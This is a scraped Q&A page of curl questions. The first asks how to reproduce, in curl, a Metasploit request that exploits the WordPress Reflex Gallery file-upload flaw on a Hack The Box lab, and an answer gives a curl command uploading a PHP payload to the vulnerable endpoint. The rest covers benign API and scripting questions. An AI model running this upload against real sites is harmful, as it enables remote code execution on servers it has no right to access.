Whats the difference between these two requests? - ruby

I'm trying to use this exploit (On HTB) without using metasploit but only the ruby request works.
Whats the difference between the ruby and curl request thats causing curl not to work?
...
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
...
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
'method' => 'POST',
'vars_get' => {
'Year' => "#{year}",
'Month' => "#{month}"
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
curl -F "type=application/octet-stream" -F "name=\"qqfile\"" -F "filename=\"pony.php\"" \
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'
Edit: To answer some of the questions in the comments.
So the goal is to upload a file to a website using a post request to php.php. Using the ruby request, the file gets uploaded successfully, but we curl the request comes back with:
No file uploaded
I assumed it was because there is a difference in requests.
The ruby request is creating a post request to the same server, with the same, name, filename, year, month, but it gets a different output due to some reason I'm trying to figure out.
Based on the output from curl, it said that POST was implied so I omitted it.
Hopefully this clarifies it, but I'll try with the ctype and posting data.
I assumed -F sent data but I was wrong.

As specified by TomLord you did'nt specified the request type which is POST.
ctype is Content-type request header.
And you are missing the file location which is being uploaded.
curl \
-X POST \
-H "Content-Type: application/octet-stream" \
-F 'name=qqfile' \
-F 'filename=random_name.php' \
-F 'data=#/path/to/pony.php' \
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'

Related

Duckling send JSON to parse method ('Need a 'text' parameter to parse' error)

I work with Duckling, whish works on my local machine on port 8000. via CURL. Requests of the following type:
curl -X POST https://0.0.0.0:8000/parse -d 'locale=en_GB&text=tomorrow at eight'
executed successfully.
But when I do so:
curl -X POST https://0.0.0.0:8000/parse -H 'Content-Type: application/json' -d '{"locale": "en_GB", "text": "tomorrow at eight"}'
The HTTP 422 code is returned with the message "Need a 'text' parameter to parse".
How to correctly pass JSON to Duckling?

Pass Associative Array as Data Param in POST request using cURL

I have an associative array that I want to pass to cURL as POST data. However i have tried multiple things, still it doesn't work.
The array:
declare -A details
details[name]="Honey"
details[class]="10"
details[section]="A"
details[subject]="maths"
The cURL commands have tried so far (all of these failed):
resp = $(cURL --request POST --data details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data variables=details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data "variables=$details" "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data "variables=${details}" "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data $details "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data ${details} "https://somedomain.net/getMarks")
resp = $(cURL --request POST --data variables=details "https://somedomain.net/getMarks")
Something like shown below, I want the above request to be (indirectly), however I want to pass the array directly instead of writing its contents.
resp = $(cURL --request POST --data '{"variables":[{"name": "Honey"},{"class": "10"},{"section": "A"},{"subject": "maths"}]}' "https://somedomain.net/getMarks")
Please note that to begin with I will always have the associative array ONLY (not any json array or string).
This question rose when I was trying calling cURL command with the associative array as on this link (GITLAB API)(the example does not contain variables array example). Here they have mentioned a variables array (array of hashes).
Since I had to use an older version of bash, which does not involve
the name referencing as stated on the answer, I had to try to
code string creation of the associative array without passing it to a function
Since I always had an associative array to begin with, the process of passing the array as accepted by the gitlab API normally was:
resp=$(cURL --request POST --data '{"variables":[{"name": "Honey"},{"class": "10"},{"section": "A"},{"subject": "maths"}]}' "https://somedomain.net/getMarks")
OR
resp=$(cURL --request POST --data "variables[name]=Honey" --data "variables[class]=10" --data "variables[section]=A" --data "variables[subject]=maths" "https://somedomain.net/getMarks")
So tried some tweaks on the second way and what worked for me was:
_sep=""
_string=""
for index in "${!details[#]}"
do
_string="${_string}${_sep}variables[${index}]="${details[$index]}"
_sep="&"
done
resp=$(cURL --request POST --data "$_string" "https://somedomain.net/getMarks")
#which indirectly was:
resp=$(cURL --request POST --data "variables[name]=Honey&variables[class]=10&variables[section]=A&variables[subject]=maths" "https://somedomain.net/getMarks")
And it was a success. Thanks to #markp-fuso for giving me an intuition of creating a string with his logic above.
Assumptions/understandings:
no need to list the array entries in any particular order
neither the array indices or values contain newlines
One bash idea:
# use a function to build the --data component
build_data() {
local -n _arr="$1" # use nameref so we can pass in the name of any associative array
local _sep=""
local _string='{"variables":['
local _i
for i in "${!_arr[#]}"
do
_string="${_string}${_sep}{\"${i}\": \"${_arr[$i]}\"}"
_sep=","
done
printf "%s]}" "${_string}"
}
Adding this to the curl call:
resp=$(cURL --request POST --data "$(build_data details)" "https://somedomain.net/getMarks")
NOTES:
no spaces allowed on either side of the =, ie, resp = $(curl ...) needs to be resp=$(curl ...)
without an actual/valid URL I'm guessing a bit on if/where the escaped quotes belong so may need to tweak the escaped quotes to get working correcly

curl: argument list too long

I want to send an email with attached pdf file through the Sparkpost API with curl post.
To insert the pdf I use (my test.pdf is ~ 200KB)
"data":"'$(cat test.pdf} | base64 --wrap=0)'"
But somehow this doesn't work out showing the following error:
/usr/bin/curl: Die Argumentliste ist zu lang (original)
/usr/bin/curl: Argument list is too long
EDIT:
curl command
curl -X POST https://api.eu.sparkpost.com/api/v1/transmissions -H 'Authorization: <APIKEY>' -H 'Content-Type: application/json' -d '{
"options":{
"open_tracking":false,
"click_tracking":false,
"inline_css":false
},
"recipients":[
{
"address":{
"email":"user#domain.tld",
"name":"user"
}
}
],
"content":{
"from":{
"name":"sender",
"email":"sender#domain.tld"
},
"reply_to":"replyto#domain.tld",
"subject":"subject",
"text":"textbody",
"attachments":[
{
"name":"attachmentname.pdf",
"type":"application/pdf",
"data":"'$(cat test.pdf | base64 --wrap=0)'"
}
]
}
}'
This is coming up because you are trying to pass the entirety of the base64'd content on the command line. curl has the ability to load in data to POST from a file, which I'd recommend doing. More information can be found in the man page, but the basic format is this:
curl -X POST -d #filename.txt https://website.com/path
According to the curl manual, the -F option allows you to encode a file for base64, but limits the output to 76 characters.
Ex:
-F '=#localfile;encoder=base64'

ASP Classic parse data from curl POST -F

I have the following CURL request which pointing to my service:
curl -X POST \
http://go.example.com/ \
-H 'Cache-Control: no-cache' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Postman-Token: cf0c1ab5-08ff-1aa2-428e-24b855e1a61c' \
-H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
-F fff=vvvvv \
-F rrrr=ddddd \
-F xx=something
I'm trying to catch the xx paramter in classic ASP code.
I tried 'Request("xx")' and 'Request.Form("xx")'.
Do you have any idea?
This is from the CURL documentation
-F, --form
(HTTP SMTP IMAP) For HTTP protocol family, this lets curl emulate a filled-in form in which a user has pressed the submit button. This causes curl to POST data using the Content-Type multipart/form-data according to RFC 2388.
When a form is submitted to Classic ASP using a content-type of multipart/form-data the only method available is Request.BinaryRead() as Request.Form is for application/x-www-form-urlencoded data.
Here is a quick example of calling Request.BinaryRead() to get you started:
<%
'Should be less than configured request limit in IIS.
Const maxRequestSizeLimit = ...
Dim dataSize: dataSize = Request.TotalBytes
Dim formData
If dataSize < maxRequestSizeLimit Then
'Read bytes into a SafeArray
formData = Request.BinaryRead(dataSize)
'Once you have a SafeArray its up to you to process it.
...
Else
Response.Status = "413 PAYLOAD TOO LARGE"
Response.End
End If
%>
Parsing a SafeArray isn't easy
If you want to still use Request.Form you can do by specifying the form parameters in the CURL command using -d instead of -F. From the documentation;
-d, --data
(HTTP) Sends the specified data in a POST request to the HTTP server, in the same way that a browser does when a user has filled in an HTML form and presses the submit button. This will cause curl to pass the data to the server using the content-type application/x-www-form-urlencoded. Compare to -F, --form.
So the CURL command would be something like;
curl -X POST \
http://go.mytest-service.com/ \
-H 'Cache-Control: no-cache' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d fff=vvvvv \
-d rrrr=ddddd \
-d xx=something
You would then retrieve the xx parameter in Classic ASP using;
<%
Dim xx: xx = Request.Form("xx")
%>
Useful Links
application/x-www-form-urlencoded or multipart/form-data?
MSDN - Request.BinaryRead Method
Example class for parsing a SafeArray (specifically the BuildUpload() method which takes a SafeArray and parses the binary)
Example implemenation of a File Uploader class using Request.BinaryRead() on Planet Source Code

Calculate OAuth signature for NetSuite restlet using bash

I'm currently trying to generate an OAuth signature for my curl request header. These point to a NetSuite restlet. Resources online are either inconclusive or too high level for my understanding/lacking examples. How do I go about calculating the oauth_signature value for my request?
The following is my request with credentials ommitted:
curl --request GET \
--url 'https://rest.na1.netsuite.com/app/site/hosting/restlet.nl?script=foo&deploy=bar' \
--header 'Authorization: OAuth realm="'"$realm"'",oauth_consumer_key="'"$oauth_consumer_key"'",oauth_token="'"$oauth_token"'",oauth_signature_method="HMAC-SHA1",oauth_timestamp="'"$(OAuth_timestamp)"'",oauth_nonce="'"$(OAuth_nonce)"'",oauth_version="1.0",oauth_signature="'"$(OAuth_signature)"'"' \
--header 'cache-control: no-cache' \
--header 'content-type: application/json' \
| jq
Below is a list of the parameters I'm passing for the sake of readability:
params=(
oauth_consumer_key='foo'
oauth_signature_method='HMAC-SHA1'
oauth_version='1.0'
oauth_nonce=$(OAuth_nonce)
oauth_timestamp=$(OAuth_timestamp)
oauth_token='tokenfoo'
realm='4478811'
)
I am generating the timestamp and nonce like so:
OAuth_nonce () {
md5 <<< "$RANDOM-$(date +%s.%N)" | cut -d' ' -f 1
}
OAuth_timestamp () {
echo "$(date +%s)"
}
I got most of my resources from https://github.com/livibetter-backup/bash-oauth but no docs exist, the examples are poor, and the library itself doesn't seem to work when I've tested the functions.
All the values I use in the script (confirmed passing with bash +x) work when ran in Postman, but I can't calculate a oauth_signature value outside of it.
How do I create a OAuth_signature function that I can return a valid signature with? What parameters am I going to have to pass that function to calculate correctly? Is it possible or easier to generate perhaps using perl or python?

Resources